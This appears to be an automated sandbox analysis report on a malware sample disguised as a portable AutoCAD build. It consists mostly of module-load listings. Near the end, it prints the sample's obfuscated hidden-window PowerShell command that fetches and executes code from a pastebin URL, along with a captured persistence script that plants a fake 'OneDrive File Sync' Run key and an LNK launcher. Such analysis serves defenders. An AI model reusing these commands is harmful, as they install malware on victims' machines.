Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
Source: BeginSync.lnk.4.drLNK file: ..\..\..\Windows\System32\forfiles.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: OSLdZanXNc.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: OSLdZanXNc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OSLdZanXNc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb2 source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.Management.Automation.pdb!F source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbt source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbX$ source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIN source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\adminalt\Autodesk.AutoCAD.2023.x64.Portable\x64\Release\PePacker.pdb) source: OSLdZanXNc.exe
Source: Binary string: \??\C:\Windows\mscorlib.pdb[ source: powershell.exe, 0000000B.00000002.3244005640.000001E850102000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb( source: powershell.exe, 0000000B.00000002.3244005640.000001E850070000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbn source: powershell.exe, 0000000B.00000002.3244005640.000001E8500A1000.00000004.00000020.00020000.00000000.sdmp
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: OSLdZanXNc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887982558 push E8FFFFFFh; iretd 11_2_00007FF88798255D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF887A46DC3 push edi; iretd 11_2_00007FF887A46DC6

Boot Survival

barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$desusertion = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $desusertionmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = 